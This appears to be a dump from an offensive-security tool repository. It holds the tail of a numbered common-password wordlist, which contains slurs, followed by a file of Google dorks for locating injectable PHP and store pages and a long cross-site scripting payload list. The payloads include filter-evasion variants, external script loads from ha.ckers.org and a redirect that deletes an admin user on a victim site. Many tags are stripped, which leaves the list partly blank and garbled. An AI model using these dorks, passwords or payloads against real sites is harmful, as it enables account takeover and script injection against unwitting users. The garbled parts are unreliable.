caroline 623 | barbara 624 | dave 625 | viper 626 | drummer 627 | action 628 | einstein 629 | bitches 630 | genesis 631 | hello1 632 | scotty 633 | friend 634 | forest 635 | 010203 636 | hotrod 637 | google 638 | vanessa 639 | spitfire 640 | badger 641 | maryjane 642 | friday 643 | alaska 644 | 1232323q 645 | tester 646 | jester 647 | jake 648 | champion 649 | billy 650 | 147852 651 | rock 652 | hawaii 653 | badass 654 | chevy 655 | 420420 656 | walker 657 | stephen 658 | eagle1 659 | bill 660 | 1986 661 | october 662 | gregory 663 | svetlana 664 | pamela 665 | 1984 666 | music 667 | shorty 668 | westside 669 | stanley 670 | diesel 671 | courtney 672 | 242424 673 | kevin 674 | porno 675 | hitman 676 | boobs 677 | mark 678 | 12345qwert 679 | reddog 680 | frank 681 | qwe123 682 | popcorn 683 | patricia 684 | aaaaaaaa 685 | 1969 686 | teresa 687 | mozart 688 | buddha 689 | anderson 690 | paul 691 | melanie 692 | abcdefg 693 | security 694 | lucky1 695 | lizard 696 | denise 697 | 3333 698 | a12345 699 | 123789 700 | ruslan 701 | stargate 702 | simpsons 703 | scarface 704 | eagle 705 | 123456789a 706 | thumper 707 | olivia 708 | naruto 709 | 1234554321 710 | general 711 | cherokee 712 | a123456 713 | vincent 714 | Usuckballz1 715 | spooky 716 | qweasd 717 | cumshot 718 | free 719 | frankie 720 | douglas 721 | death 722 | 1980 723 | loveyou 724 | kitty 725 | kelly 726 | veronica 727 | suzuki 728 | semperfi 729 | penguin 730 | mercury 731 | liberty 732 | spirit 733 | scotland 734 | natalie 735 | marley 736 | vikings 737 | system 738 | sucker 739 | king 740 | allison 741 | marshall 742 | 1979 743 | 098765 744 | qwerty12 745 | hummer 746 | adrian 747 | 1985 748 | vfhbyf 749 | sandman 750 | rocky 751 | leslie 752 | antonio 753 | 98765432 754 | 4321 755 | softball 756 | passion 757 | mnbvcxz 758 | bastard 759 | passport 760 | horney 761 | rascal 762 | howard 763 | franklin 764 | bigred 765 | assman 766 | alexander 767 | homer 768 | redrum 769 | jupiter 770 | claudia 771 | 55555555 772 | 141414 773 | zaq12wsx 774 | shit 775 | patches 776 | nigger 777 | cunt 778 | raider 779 | infinity 780 | andre 781 | 54321 782 | galore 783 | college 784 | russia 785 | kawasaki 786 | bishop 787 | 77777777 788 | vladimir 789 | money1 790 | freeuser 791 | wildcats 792 | francis 793 | disney 794 | budlight 795 | brittany 796 | 1994 797 | 00000000 798 | sweet 799 | oksana 800 | honda 801 | domino 802 | bulldogs 803 | brutus 804 | swordfis 805 | norman 806 | monday 807 | jimmy 808 | ironman 809 | ford 810 | fantasy 811 | 9999 812 | 7654321 813 | PASSWORD 814 | hentai 815 | duncan 816 | cougar 817 | 1977 818 | jeffrey 819 | house 820 | dancer 821 | brooke 822 | timothy 823 | super 824 | marines 825 | justice 826 | digger 827 | connor 828 | patriots 829 | karina 830 | 202020 831 | molly 832 | everton 833 | tinker 834 | alicia 835 | rasdzv3 836 | poop 837 | pearljam 838 | stinky 839 | naughty 840 | colorado 841 | 123123a 842 | water 843 | test123 844 | ncc1701d 845 | motorola 846 | ireland 847 | asdfg 848 | slut 849 | matt 850 | houston 851 | boogie 852 | zombie 853 | accord 854 | vision 855 | bradley 856 | reggie 857 | kermit 858 | froggy 859 | ducati 860 | avalon 861 | 6666 862 | 9379992 863 | sarah 864 | saints 865 | logitech 866 | chopper 867 | 852456 868 | simpson 869 | madonna 870 | juventus 871 | claire 872 | 159951 873 | zachary 874 | yfnfif 875 | wolverin 876 | warcraft 877 | hello123 878 | extreme 879 | penis 880 | peekaboo 881 | fireman 882 | eugene 883 | brenda 884 | 123654789 885 | russell 886 | panthers 887 | georgia 888 | smith 889 | skyline 890 | jesus 891 | elizabet 892 | spiderma 893 | smooth 894 | pirate 895 | empire 896 | bullet 897 | 8888 898 | virginia 899 | valentin 900 | psycho 901 | predator 902 | arizona 903 | 134679 904 | mitchell 905 | alyssa 906 | vegeta 907 | titanic 908 | christ 909 | goblue 910 | fylhtq 911 | wolf 912 | mmmmmm 913 | kirill 914 | indian 915 | hiphop 916 | baxter 917 | awesome 918 | people 919 | danger 920 | roland 921 | mookie 922 | 741852963 923 | 1111111111 924 | dreamer 925 | bambam 926 | arnold 927 | 1981 928 | skipper 929 | serega 930 | rolltide 931 | elvis 932 | changeme 933 | simon 934 | 1q2w3e 935 | lovelove 936 | fktrcfylh 937 | denver 938 | tommy 939 | mine 940 | loverboy 941 | hobbes 942 | happy1 943 | alison 944 | nemesis 945 | chevelle 946 | cardinal 947 | burton 948 | wanker 949 | picard 950 | 151515 951 | tweety 952 | michael1 953 | 147852369 954 | 12312 955 | xxxx 956 | windows 957 | turkey 958 | 456789 959 | 1974 960 | vfrcbv 961 | sublime 962 | 1975 963 | galina 964 | bobby 965 | newport 966 | manutd 967 | daddy 968 | american 969 | alexandr 970 | 1966 971 | victory 972 | rooster 973 | qqq111 974 | madmax 975 | electric 976 | bigcock 977 | a1b2c3 978 | wolfpack 979 | spring 980 | phpbb 981 | lalala 982 | suckme 983 | spiderman 984 | eric 985 | darkside 986 | classic 987 | raptor 988 | 123456789q 989 | hendrix 990 | 1982 991 | wombat 992 | avatar 993 | alpha 994 | zxc123 995 | crazy 996 | hard 997 | england 998 | brazil 999 | 1978 1000 | 01011980 1001 | wildcat 1002 | polina 1003 | freepass 1004 | -------------------------------------------------------------------------------- /core/xssd.txt: -------------------------------------------------------------------------------- 1 | [Dorks] 2 | 3 | 4 | 5 | 6 | 7 | inurl:".php?cmd=" 8 | inurl:".php?z=" 9 | inurl:".php?q=" 10 | inurl:".php?search=" 11 | inurl:".php?query=" 12 | inurl:".php?searchst­ring=" 13 | inurl:".php?keyword=­" 14 | inurl:".php?file=" 15 | inurl:".php?years=" 16 | inurl:".php?txt=" 17 | inurl:".php?tag=" 18 | inurl:".php?max=" 19 | inurl:".php?from=" 20 | inurl:".php?author=" 21 | inurl:".php?pass=" 22 | inurl:".php?feedback­=" 23 | inurl:".php?mail=" 24 | inurl:".php?cat=" 25 | inurl:".php?vote=" 26 | inurl:search.php?q= 27 | inurl:com_feedpostol­d/feedpost.php?url= 28 | inurl:scrapbook.php?­id= 29 | inurl:headersearch.p­hp?sid= 30 | inurl:/poll/­default.asp?catid= 31 | inurl:/­search_results.php?se­arch= 32 | # Special ;) 33 | inurl:categoryId inurl:storeId (2 million results) 34 | inurl:resultCatEntryType 35 | inurl:searchTermScope 36 | inurl:”webapp/wcs” 37 | inurl:”ProductListingView” 38 | inurl:”AdvancedSearchDisplay” 39 | inurl:”CompareProductsDisplayView” 40 | inurl:parent_category_rn 41 | 42 | 43 | 44 | 45 | 46 | [Payload] 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | CLICKME CLICKME 57 | 58 | 59 | 60 | 61 | 62 | 63 |
  • 64 | XXX 65 | 66 | 67 | 68 | 69 | alert(1)0 70 |
    71 | 72 | 73 | 74 | 75 | "> 78 | "> 79 | "> 80 | "> 81 | 82 | <% foo> 83 |
    84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | XXX 119 | 120 | 121 | 122 | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> 123 | <!--[if]><script>javascript:alert(1)</script --> 124 | <!--[if<img src=x onerror=javascript:alert(1)//]> --> 125 | <script src="/\%(jscript)s"></script> 126 | <script src="\\%(jscript)s"></script> 127 | <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> 128 | <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X 129 | <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> 130 | <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d 131 | <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> 132 | <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> 133 | <style>*[{}@import'%(css)s?]</style>X 134 | <div style="font-family:'foo ;color:red;';">XXX 135 | <div style="font-family:foo}color=red;">XXX 136 | <// style=x:expression\28javascript:alert(1)\29> 137 | <style>*{x:expression(javascript:alert(1))}</style> 138 | <div style=content:url(%(svg)s)></div> 139 | <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X 140 | <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> 141 | <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X 142 | <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X 143 | <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> 144 | <x style="background:url('x;color:red;/*')">XXX</x> 145 | <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> 146 | <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> 147 | <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> 148 | <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> 149 | <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi 150 | <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> 151 | <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ 152 | X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > 153 | 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 154 | 155 | 156 | <IMG SRC="jav ascript:alert('XSS');"> 157 | perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out 158 | <IMG SRC="  javascript:alert('XSS');"> 159 | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> 160 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> 161 | <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> 162 | <<SCRIPT>alert("XSS");//<</SCRIPT> 163 | <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > 164 | <SCRIPT SRC=//ha.ckers.org/.j> 165 | <IMG SRC="javascript:alert('XSS')" 166 | <iframe src=http://ha.ckers.org/scriptlet.html < 167 | \";alert('XSS');// 168 | 169 | 170 | 171 | 172 | 173 |
    • XSS
      174 | 175 | 176 | 177 | 178 |
      179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | exp/* 187 | 188 | 189 | 190 | 191 | 192 | 193 | ¼script¾alert(¢XSS¢)¼/script¾ 194 | 195 | 196 | 197 | 198 | 199 | 200 |
  • 201 |
    202 |
    203 |
    204 |
    205 |
    206 | 207 | 208 | 209 | 210 | 211 | alert("XSS")'); ?> 212 | 213 | Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser 214 | 215 | +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- 216 | 217 | 218 | 219 | 220 | 221 | 222 | PT SRC="http://ha.ckers.org/xss.js"> 223 | XSS 224 | XSS 225 | XSS 226 | XSS 227 | XSS 228 | XSS 229 | 298 | 299 | 300 | 301 | click 302 | 303 | 310 | 311 | 312 | 315 | --!> 320 | 321 |
    x 322 | "> 323 |